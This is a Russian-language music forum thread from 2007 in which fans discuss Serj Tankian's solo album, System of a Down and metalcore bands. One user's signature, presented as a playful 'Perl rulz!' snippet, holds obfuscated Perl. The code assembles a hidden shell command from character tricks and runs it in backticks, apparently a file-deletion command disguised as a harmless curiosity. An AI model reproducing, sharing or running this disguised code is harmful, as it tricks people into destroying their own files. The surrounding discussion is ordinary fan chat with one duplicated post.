Maynard
но записал то все равно на своей студии, а через Reprise Records будет распространять, и я не думаю что кто на него давил или ставил какие-то условия, он просто записал,что хотел, а Reprise Records дал согласие на распространение альбома. _________________ Define the riddles of my mind
nothing is really as it seems
сериал я этот не люблю и не смотрю, но пример нормальный, но можно и в музыке подобные примеры найти, например металкорные крупы, типа чимайры, статик х, они рубят качественный и техничный музон, но не цепляет, ничем, у соад не так всё было, поэтому они и не пишут пока новый альбом, если бы хотели, они записали бы что нибудь качественное, может даже и в своём стиле, но это был бы уже на соад, они потеряли бы марку, так же и серж, я не чувствую в его творчестве этих шаблонов.
Добавлено: Пт Авг 17, 2007 2:10 am Заголовок сообщения:
А чё это спешиал эдишн меньше стоит?Сокращённая версия что-ли? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Пт Авг 17, 2007 8:43 am Заголовок сообщения:
Мишка
американский импорт, релиз на месяц пожже _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вт Авг 21, 2007 7:46 am Заголовок сообщения:
Да с вами даже разговаривать не о чем... _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
сериал я этот не люблю и не смотрю, но пример нормальный, но можно и в музыке подобные примеры найти, например металкорные крупы, типа чимайры, статик х, они рубят качественный и техничный музон, но не цепляет, ничем, у соад не так всё было, поэтому они и не пишут пока новый альбом, если бы хотели, они записали бы что нибудь качественное, может даже и в своём стиле, но это был бы уже на соад, они потеряли бы марку, так же и серж, я не чувствую в его творчестве этих шаблонов.
ты привел в пример статик х. а их фанаты, которые не понимают соад, могут тоже самое сказать про них.